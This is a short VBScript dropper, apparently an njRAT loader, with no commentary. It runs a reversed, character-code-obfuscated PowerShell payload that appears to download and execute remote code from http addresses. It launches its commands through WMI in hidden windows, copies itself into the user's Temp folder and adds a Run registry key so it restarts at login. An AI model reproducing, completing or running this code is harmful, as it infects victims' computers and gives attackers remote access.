NJRATTTTT

1. f="XEI|)oM$(gnirtSteG.IICSA::]gnidocnE.txeT.metsyS[;)14,201,63,44,93,101,021,101,64,001,801,501,711,66,38,77,93,04,101,021,101,85,85,39,211,711,611,501,701,99,79,27,64,701,19,95,88,96,37,421,14,93,021,84,93,44,93,64,64,93,04,101,99,79,801,211,101,411,64,14,93,79,411,411,76,401,65,99,411,74,911,79,411,74,901,111,99,64,011,501,89,101,611,511,79,211,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,201,63,39,39,19,101,611,121,66,19,95,88,96,37,421,14,93,301,211,601,64,101,08,011,711,28,74,201,001,211,74,411,89,64,901,111,99,64,79,301,711,411,79,611,411,79,611,511,111,501,221,711,89,74,74,85,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,601,201,63,95,14,93,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,93,04,101,901,79,87,801,79,501,611,411,79,08,401,611,501,78,001,79,111,67,85,85,39,121,801,89,901,101,511,511,56,64,011,111,501,611,99,101,801,201,101,28,64,901,101,611,511,121,38,19,23,39,001,501,111,811,19(@=oM$"
2. exec(replace("Pow%rsh%ll","%","e")+space(1)+StrReverse(f))
3. set fso0 = CreateObject("Scripting.FileSystemObject")
4. CurrentDirectory = fso0.GetParentFolderName(WScript.ScriptFullName)
5. sname= wsh.scriptname
6. startupfolder="C:\Users\"+CreateObject("WScript.Network").UserName+"\AppData\Local\Temp"
7.  
8. exec("Powershell " +"Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value "+"'"+startupfolder+ "\"+ sname+"'")
9.  
10. if CurrentDirectory = startupfolder Then
11.  
12. WScript.Quit()
13. else
14.  
15. mnb()
16. End if
17.  
18. sub mnb()
19.  
20.  
21. If (fso0.FileExists(CurrentDirectory+ "\"+ sname)) Then
22. sSourceFile = CurrentDirectory+ "\"+ sname
23.  
24. sCmd = "cmd /c copy """ & sSourceFile & """ """ & startupfolder & """ /Y"
25. exec(sCmd)
26.  
27. WScript.Quit()
28. Else
29. WScript.Quit()
30. End If
31.  
32. End sub
33. sub exec(Atc)
34. strCommand = Atc
35. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
36. Set objStartup = objWMIService.Get("Win32_ProcessStartup")
37. Set objConfig = objStartup.SpawnInstance_
38. objConfig.ShowWindow = 0
39. Set objProcess = objWMIService.Get("Win32_Process")
40. intReturn = objProcess.Create(strCommand, Null, objConfig, intProcessID)
41. End sub